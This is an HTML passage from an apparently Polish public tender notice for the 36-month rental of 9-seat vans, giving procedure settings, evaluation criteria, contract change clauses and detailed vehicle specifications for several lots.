id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Prawo zamówień publicznych.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, wraz z załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert zgodnie z Załącznikiem nr 5 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Specyfikacje techniczne samochodu zgodnie z Załącznikiem nr 7 do SIWZ</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Stosowne pełnomocnictwa jeżeli dotyczą Wykonawcy.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>3.2.	termin przekazania samochodu </TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>3.3.	Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w przypadku:1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy - w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;2) zmian osób do kierowania i koordynowania spraw związanych z realizacją umowy po stronie Wykonawcy lub Zamawiającego – w zakresie pisemnego zawiadomienia bez konieczności sporządzania aneksu do umowy;3) zmiany nazwy oraz formy prawnej Stron - w zakresie dostosowania umowy do tych zmian;4)	wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) – w zakresie dostosowania umowy do zmian nią spowodowanych.Zmiany, o których mowa powyżej nie mogą spowodować zwiększenia wartości wynagrodzenia brutto, z wyjątkiem przypadku wskazanego w projekcie umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">Zgodnie z obowiązującymi przepisami w tym zakresie.</span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony">Zgodnie z obowiązującymi przepisami w tym zakresie.</span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-08-07</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>zadanie A: Długoterminowy najem jednego 9-osobowego samochodu osobowego na potrzeby Działu Inwestycji i Remontów.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu long, 9-miejscowe, homologacja osobowa	tak3	Ilość drzwi, w tym odsuwane drzwi po prawej stronie 44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności	min 1400 cm37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika	min 110 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym max 10 l / 100 km11	Poduszka powietrzna kierowcy i pasażera	tak12	Układ bezpieczeństwa ABS z EBD	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja przestrzeni pasażerskiej	tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne - przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczna	tak19	Radio z zestawem głośnomówiącym Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Czujniki monitorowania ciśnienia w oponach	tak24	Fotel kierowcy z regulacją wysokości	tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa	min 45 l27	Wszystkie siedzenia z obiciami /pokrowcami ze skaju	tak28	Gniazdo 12V w kabinie kierowcy	tak29	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak32	Opony wielosezonowe (lato/zima)	tak33	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania A – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,	wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>zadanie B: Długoterminowy najem jednego 9-osobowego samochodu osobowego na potrzeby Działu Utrzymania Czystości</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu long, 9-miejscowe, homologacja osobowa	tak3	Ilość drzwi, w tym odsuwane drzwi po prawej stronie 44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności	min 1400 cm37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika	min 110 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym max 10 l / 100 km11	Poduszka powietrzna kierowcy i pasażera	tak12	Układ bezpieczeństwa ABS z EBD	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja przestrzeni pasażerskiej	tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne - przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczna	tak19	Radio z zestawem głośnomówiącym Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Czujniki monitorowania ciśnienia w oponach	tak24	Fotel kierowcy z regulacją wysokości	tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa	min 45 l27	Wszystkie siedzenia z obiciami /pokrowcami ze skaju	tak28	Gniazdo 12V w kabinie kierowcy	tak29	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak32	Opony wielosezonowe (lato/zima)	tak33	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania B – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,	wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>zadanie C: Długoterminowy najem jednego 9-osobowego samochodu osobowego na potrzeby Działu Utrzymania Czystości.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu long, 9-miejscowe, homologacja osobowa	tak3	Ilość drzwi, w tym odsuwane drzwi po prawej stronie 44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności	min 1400 cm37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika	min 110 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym max 10 l / 100 km11	Poduszka powietrzna kierowcy i pasażera	tak12	Układ bezpieczeństwa ABS z EBD	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja przestrzeni pasażerskiej	tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne - przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczna	tak19	Radio z zestawem głośnomówiącym Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Czujniki monitorowania ciśnienia w oponach	tak24	Fotel kierowcy z regulacją wysokości	tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa	min 45 l27	Wszystkie siedzenia z obiciami /pokrowcami ze skaju	tak28	Gniazdo 12V w kabinie kierowcy	tak29	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona 